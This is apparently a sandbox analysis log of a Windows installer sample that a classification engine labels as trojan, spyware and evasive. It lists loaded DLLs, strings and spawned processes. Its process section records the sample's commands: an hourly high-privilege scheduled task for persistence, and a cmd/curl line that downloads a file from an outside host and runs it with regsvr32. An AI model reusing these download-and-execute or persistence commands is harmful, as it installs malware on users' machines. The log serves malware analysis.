    Source: C:\Program Files (x86)\Main\Chop\Install.exe | Code function: 15_2_00007FF7D3CF0CB0
    Source: C:\Program Files (x86)\Main\Chop\Install.exe | Code function: 15_2_00007FF7D3CFF480
    Source: C:\Program Files (x86)\Main\Chop\Install.exe | Code function: 15_2_00007FF7D3CF7BE0
    Source: C:\Program Files (x86)\Main\Chop\Install.exe | Code function: 15_2_00007FF7D3CE8BA4
    Source: C:\Program Files (x86)\Main\Chop\Install.exe | Code function: 15_2_00007FF7D3D1E3D0
    Source: C:\Program Files (x86)\Main\Chop\Install.exe | Code function: 15_2_00007FF7D3CF7290
    Source: C:\Program Files (x86)\Main\Chop\Install.exe | Code function: 15_2_00007FF7D3CF2220
    Source: C:\Program Files (x86)\Main\Chop\Install.exe | Code function: 15_2_00007FF7D3CE7210
    Source: C:\Program Files (x86)\Main\Chop\Install.exe | Code function: 15_2_00007FF7D3CE8A00
    Source: C:\Program Files (x86)\Main\Chop\Install.exe | Code function: 15_2_00007FF7D3D14990
    Source: C:\Program Files (x86)\Main\Chop\Install.exe | Code function: 15_2_00007FF7D3D00936
    Source: C:\Program Files (x86)\Main\Chop\Install.exe | Code function: 15_2_00007FF7D3D008B1
    Source: C:\Program Files (x86)\Main\Chop\Install.exe | Code function: 15_2_00007FF7D3CEB0B0
    Source: C:\Program Files (x86)\Main\Chop\Install.exe | Code function: 15_2_00007FF7D3D8A0A0
    Source: C:\Program Files (x86)\Main\Chop\Install.exe | Code function: 15_2_00007FF7D3CF8860
    Source: C:\Program Files (x86)\Main\Chop\Install.exe | Code function: 15_2_00007FF7D3CF2F70
    Source: C:\Program Files (x86)\Main\Chop\Install.exe | Code function: 15_2_00007FF7D3D00E30
    Source: C:\Program Files (x86)\Main\Chop\Install.exe | Code function: 15_2_00007FF7D3D05D40
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Code function: 21_2_00007FF68E749868
    Source: Joe Sandbox View | Dropped File: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe 916084789D8A4864E93AFF0D0C22EB56E19C201C19EA2C8601D23B5C3C345519
    Source: C:\Users\user\Desktop\1.exe | Code function: String function: 00758720 appears 108 times
    Source: C:\Users\user\Desktop\1.exe | Code function: String function: 007587C0 appears 60 times
    Source: C:\Users\user\Desktop\1.exe | Code function: String function: 00983F50 appears 41 times
    Source: C:\Users\user\Desktop\1.exe | Code function: String function: 00759240 appears 244 times
    Source: C:\Users\user\Desktop\1.exe | Code function: String function: 008A84C0 appears 32 times
    Source: C:\Users\user\Desktop\1.exe | Code function: String function: 0075ADE0 appears 71 times
    Source: C:\Users\user\Desktop\1.exe | Code function: String function: 0097FE17 appears 55 times
    Source: C:\Users\user\Desktop\1.exe | Code function: String function: 008A8720 appears 64 times
    Source: C:\Users\user\Desktop\1.exe | Code function: String function: 00763440 appears 47 times
    Source: C:\Users\user\Desktop\1.exe | Code function: String function: 0075A7A0 appears 63 times
    Source: C:\Users\user\Desktop\1.exe | Code function: String function: 00983394 appears 81 times
    Source: C:\Program Files (x86)\Main\Chop\Install.exe | Code function: String function: 00007FF7D3CEC9D0 appears 63 times
    Source: 1.exe | Static PE information: invalid certificate
    Source: MainSoftware.exe.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Source: SoftwareDistributor.exe.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Source: SoftwareDistributor.exe.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Source: MainSoftware.exe.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Source: Install.exe.part.8.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Source: Surfclub.exe.25.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
    Source: Install.exe.part.8.dr | Static PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"
    Source: 1.exe, 00000000.00000003.1953629935.000000000CC7B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Threading.Channels.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000CC11000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Runtime.Numerics.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000CC89000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Extensions.Configuration.Abstractions.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C8F7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.NetworkInformation.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1702765989.0000000009BF5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamewininet.dllD vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C7E7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Collections.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000CC6C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Security.Principal.Windows.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C986000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Private.CoreLib.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C859000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Linq.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C843000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.IO.Compression.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSoftwareDetector.dllF vs 1.exe
    Source: 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameShortcutFlags.dllF vs 1.exe
    Source: 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAICustAct.dllF vs 1.exe
    Source: 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamePrereq.dllF vs 1.exe
    Source: 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameFileOperations.dllF vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C7FB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Diagnostics.DiagnosticSource.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C850000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.IO.MemoryMappedFiles.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C902000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.Primitives.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000D3CB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Extensions.Configuration.Abstractions.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C8EC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.NameResolution.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C7E0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Collections.NonGeneric.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000CBDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Private.Uri.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000CC23000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Security.Claims.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000CBF4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Reflection.Metadata.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C7C6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.Registry.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C7C0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMSIInstaller.dll: vs 1.exe
    Source: 1.exe, 00000000.00000003.1697942133.00000000099F0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelzmaextractor.dllF vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C7F4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.ComponentModel.TypeConverter.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C7D8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Collections.Immutable.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C981000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.ObjectModel.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C932000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.Security.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000CC29000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Security.Cryptography.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C7EE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.ComponentModel.Primitives.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C868000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Net.Http.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C837000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Formats.Asn1.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C7B7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSerilog.Sinks.Http.dllF vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000CC85000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C7A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSerilog.dll0 vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C7B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSerilog.Formatting.Compact.dllV vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C63F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemscordaccore.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C63F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMSIInstaller.dll: vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C63F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Extensions.Configuration.Abstractions.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C81D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C7CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.Concurrent.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C832000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.StackTrace.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C966000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Sockets.dll@ vs 1.exe
    Source: 1.exe, 00000000.00000003.1953629935.000000000C917000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.Quic.dll@ vs 1.exe
    Source: 1.exe, 00000004.00000003.1886484951.00000000075B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewininet.dllD vs 1.exe
    Source: 1.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
    Source: classification engine | Classification label: mal46.troj.spyw.evad.winEXE@38/90@6/7
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_008B9740 FormatMessageW,GetLastError,0_2_008B9740
    Source: C:\Program Files (x86)\Main\Chop\Install.exe | Code function: 15_2_00007FF7D3CF2050 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma,15_2_00007FF7D3CF2050
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_008EE280 GetDiskFreeSpaceExW,0_2_008EE280
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_008C0A10 CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,CloseHandle,0_2_008C0A10
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00907140 CoCreateInstance,0_2_00907140
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_0075A660 LoadResource,LockResource,SizeofResource,0_2_0075A660
    Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\Atomix
    Source: C:\Users\user\Desktop\1.exe | File created: C:\Users\user\AppData\Roaming\Atomix
    Source: C:\Program Files\Surfclub\Surfclub.exe | Mutant created: NULL
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5212:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3260:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2176:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5252:120:WilError_03
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1432:120:WilError_03
    Source: C:\Users\user\Desktop\1.exe | File created: C:\Users\user\AppData\Local\Temp\shi6FC2.tmp
    Source: 1.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\1.exe | File read: C:\Users\desktop.ini
    Source: C:\Users\user\Desktop\1.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Users\user\Desktop\1.exe | File read: C:\Users\user\Desktop\1.exe
    Source: unknown | Process created: C:\Users\user\Desktop\1.exe "C:\Users\user\Desktop\1.exe"
    Source: unknown | Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
    Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 1514DFDED1D4D3DC7DCB6F08CA344BC7 C
    Source: C:\Users\user\Desktop\1.exe | Process created: C:\Users\user\Desktop\1.exe "C:\Users\user\Desktop\1.exe" /i "C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Distributor Software.msi" AI_EUIMSI=1 APPDIR="C:\Program Files (x86)\Atomix" SECONDSEQUENCE="1" CLIENTPROCESSID="5480" CHAINERUIPROCESSID="5480Chainer" ACTION="INSTALL" EXECUTEACTION="INSTALL" CLIENTUILEVEL="0" ADDLOCAL="MainFeature" PRIMARYFOLDER="APPDIR" ROOTDRIVE="C:\" AI_DETECTED_ADMIN_USER="1" AI_SETUPEXEPATH="C:\Users\user\Desktop\1.exe" SETUPEXEDIR="C:\Users\user\Desktop\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1740568836 " TARGETDIR="C:\" AI_SETUPEXEPATH_ORIGINAL="C:\Users\user\Desktop\1.exe" AI_INSTALL="1"
    Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 2A686A53703CFC1ECF33E3BA90C58CFA
    Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding B87F19D5FD070A95D977AA5C885A4C95 E Global\MSI0000
    Source: C:\Windows\System32\msiexec.exe | Process created: C:\Program Files (x86)\Main\MainSoftware.exe "C:\Program Files (x86)\Main\MainSoftware.exe" Persistent
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /create /sc hourly /tn "MyPersistentApp_Hourly" /tr "\"C:\Program Files (x86)\Main\MainSoftware.exe\" Loop" /ru "user-PC\user" /RL HIGHEST /f
    Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /run /tn "MyPersistentApp_Hourly"
    Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknown | Process created: C:\Program Files (x86)\Main\MainSoftware.exe "C:\Program Files (x86)\Main\MainSoftware.exe" Loop
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | Process created: C:\Program Files (x86)\Main\Chop\Install.exe "C:\Program Files (x86)\Main\Chop\Install.exe"
    Source: C:\Program Files (x86)\Main\Chop\Install.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Program Files (x86)\Main\Chop\Install.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /v /c"set rnd=%tmp%\%random%0.ocx&& curl --ssl-no-revoke https://wetransfers.io/v.php -o "!rnd!" && regsvr32 /s /i "!rnd!""
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl --ssl-no-revoke https://wetransfers.io/v.php -o "C:\Users\user\AppData\Local\Temp\289930.ocx"
    Source: C:\Windows\System32\msiexec.exe | Process created: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe "C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe" https://p1-ag5.pages.dev?source_id=1
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exe | Process created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "InstallTask_b47d7aaf-09c8-4184-ab39-616e25aeaf6e" /tr "\"C:\Program Files\Surfclub\Install.exe\" install https://p1-ag5.pages.dev?source_id=1" /sc once /st 06:25:46 /ru SYSTEM /f
    Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s /i "C:\Users\user\AppData\Local\Temp\289930.ocx"
    Source: unknown | Process created: C:\Program Files\Surfclub\Install.exe "C:\Program Files\Surfclub\Install.exe" install https://p1-ag5.pages.dev?source_id=1
    Source: C:\Program Files\Surfclub\Install.exe | Process created: C:\Program Files\Surfclub\Surfclub.exe "C:\Program Files\Surfclub\Surfclub.exe" install https://p1-ag5.pages.dev?source_id=1
    Source: unknown | Process created: C:\Program Files\Surfclub\Surfclub.exe "C:\Program Files\Surfclub\Surfclub.exe" update
    Source: C:\Users\user\Desktop\1.exe | Section loaded: windowscodecs.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: msi.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: usp10.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: msls31.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: version.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: mpr.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: uxtheme.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: profapi.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: userenv.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: dwmapi.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: davhlpr.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: msimg32.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: dbghelp.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: wininet.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: urlmon.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: iertutil.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: srvcli.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: netutils.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: cabinet.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: propsys.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: rsaenh.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: apphelp.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: msasn1.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: lpk.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: msihnd.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: cryptsp.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: secur32.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: samcli.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: netapi32.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: wkscli.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: kernel.appcore.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: riched20.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: windows.storage.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: wldp.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: atlthunk.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: textinputframework.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: coreuicomponents.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: coremessaging.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: ntmarta.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: wintypes.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: wintypes.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: wintypes.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: textshaping.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: sspicli.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: explorerframe.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: tsappcmp.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: cryptbase.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: msisip.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: gpapi.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: mscoree.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: pcacli.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: edputil.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: windows.staterepositoryps.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: appresolver.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: bcp47langs.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: slc.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: sppc.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: onecorecommonproxystub.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: onecoreuapcommonproxystub.dll
    Source: C:\Users\user\Desktop\1.exe | Section loaded: taskschd.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: apphelp.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: aclayers.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc_os.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: msi.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: tsappcmp.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: userenv.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: profapi.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: sspicli.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: netapi32.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: wkscli.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: netutils.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: srclient.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: spp.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: powrprof.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: vssapi.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: vsstrace.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: umpdc.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: wldp.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: msasn1.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: rsaenh.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: cryptbase.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: msisip.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: gpapi.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: mscoree.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: version.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: rstrtmgr.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: ncrypt.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: ntasn1.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: pcacli.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: mpr.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: ntmarta.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msi.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netapi32.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: userenv.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: samcli.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: logoncli.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netapi32.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: userenv.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: samcli.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: logoncli.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.ui.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windowmanagementapi.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: textinputframework.dll
    Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: inputhost.dll
